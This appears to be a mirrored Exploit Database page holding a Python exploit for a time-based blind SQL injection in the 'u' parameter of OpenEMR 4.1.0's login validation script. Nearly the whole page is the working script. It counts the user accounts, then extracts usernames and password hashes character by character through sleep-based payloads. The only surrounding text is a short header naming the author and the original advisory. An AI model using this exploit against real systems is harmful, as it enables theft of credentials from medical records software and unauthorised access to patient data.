OpenEMR 4.1.0 – ‘u’ SQL Injection

• Exploit Database
• 125 阅读

• 作者： Michael Ikua
  日期： 2021-04-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49742/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: OpenEMR 4.1.0 - &apos;u&apos; SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip # Version: 4.1.0 # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/   #!/usr/bin/env python3   import requests import string import sys   print(""" ____ _______________ __ __ ___ ____ / __ \___________/ ____/|// __ \ / // /<// __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ // // /_/ // / / / / /_/ / /_/ /__/ / / / /___/ // / _, _//____/ / // /_/ / \____/ .___/\___/_/ /_/_____/_//_/_/ |_| /_/ (_)_(_)____/ /_/ _______ __ _____ _______ / __ )/ (_)_______/ // ___// __ \/ / (_) / /_/ / / / __ \/ __/ \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike """)   all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u="   def extract_users_num(): print("[+] Finding number of users...") for n in range(1,100): payload = &apos;\&apos;%2b(SELECT+if((select count(username) from users)=&apos; + str(n) + &apos;,sleep(3),1))%2b\&apos;&apos; r = requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("[+] Found number of users: " + str(user_length)) return user_length   def extract_users(): users = extract_users_num() print("[+] Extracting username and password hash...") output = [] for n in range(1,1000): payload = &apos;\&apos;%2b(SELECT+if(length((select+group_concat(username,\&apos;:\&apos;,password)+from+users+limit+0,1))=&apos; + str(n) + &apos;,sleep(3),1))%2b\&apos;&apos; #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = &apos;\&apos;%2b(SELECT+if(ascii(substr((select+group_concat(username,\&apos;:\&apos;,password)+from+users+limit+0,1),&apos;+ str(i)+&apos;,1))=&apos;+str(ord(char))+&apos;,sleep(3),1))%2b\&apos;&apos; #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end=&apos;&apos;, flush=True)     try: extract_users() except KeyboardInterrupt: print("") print("[+] Exiting...") sys.exit()